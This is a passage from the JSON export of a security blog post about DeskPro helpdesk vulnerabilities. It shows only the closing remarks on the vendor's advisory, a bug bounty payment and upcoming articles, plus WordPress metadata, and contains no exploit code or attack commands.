has released a security advisory regarding this issue on their website (https:\/\/support.deskpro.com\/en\/news\/posts\/deskpro-security-update-2019-09) but they failed to mention the remote code execution warning, we tried to contact them several times in this regard but we have not heard back from them.<\/p>\n<p>Bitdefender also rewarded us with $5,000 USD as part of their bug bounty program. So thanks for this as well :).<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Whats_Next\"><\/span>What&#8217;s Next?<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>In the upcoming articles we will talk about other remote code execution vulnerabilities we discovered in osTicket and Kayako. So go update your systems and get ready to hack the world!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>We decided to look at the most popular on-premise helpdesk solutions. In this article we explain how we managed to find and exploit multiple vulnerabilities that eventually lead to remote code execution (RCE) at DeskPro software utilized by thousands of organizations using Bitdefender and Freelancer Inc in a case study. No full exploit is currently available, but steps can be easily reproduced and used to build one.<\/p>\n","protected":false},"author":5,"featured_media":518,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[31,63,64,65],"class_list":["entry","author-0xsyndr0me","has-excerpt","post-502","post","type-post","status-publish","format-standard","has-post-thumbnail","category-web-security","tag-bugbounty","tag-deskpro","tag-helpdesk","tag-information-security"],"_links":{"self":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/comments?post=502"}],"version-history":[{"count":19,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/502\/revisions"}],"predecessor-version":[{"id":530,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/502\/revisions\/530"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media\/518"}],"wp:attachment":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media?parent=502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/categories?post=502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/tags?post=502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}